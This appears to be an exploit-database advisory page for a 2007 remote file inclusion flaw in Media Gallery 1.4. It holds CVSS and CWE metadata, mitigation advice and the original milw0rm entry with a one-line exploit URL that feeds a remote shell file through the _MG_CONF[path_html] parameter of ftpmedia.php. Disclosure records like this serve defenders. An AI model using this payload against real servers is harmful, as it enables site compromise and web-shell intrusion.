header-logo
Suggest Exploit
vendor:
Media Gallery
by:
ThE TiGeR
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name: Media Gallery
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Media Gallery =>v1.4 Remote file inclusion

This exploit allows remote attackers to include arbitrary files via a specially crafted URL in the _MG_CONF[path_html] parameter in the ftpmedia.php script.

Mitigation:

Apply the latest patch or upgrade to a newer version of Media Gallery.
Source

Exploit-DB raw data:

#Media Gallery =>v1.4 Remote file inclusion

#Download script : http://switch.dl.sourceforge.net/sourceforge/mediagallery/mediagallery-1.4.6-1.3.11.tar.gz

#Thanks Str0ke

#Exploit :

#http://victime.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[com]

# milw0rm.com [2007-05-14]

Navigation

Suggest Exploit

Services By CQR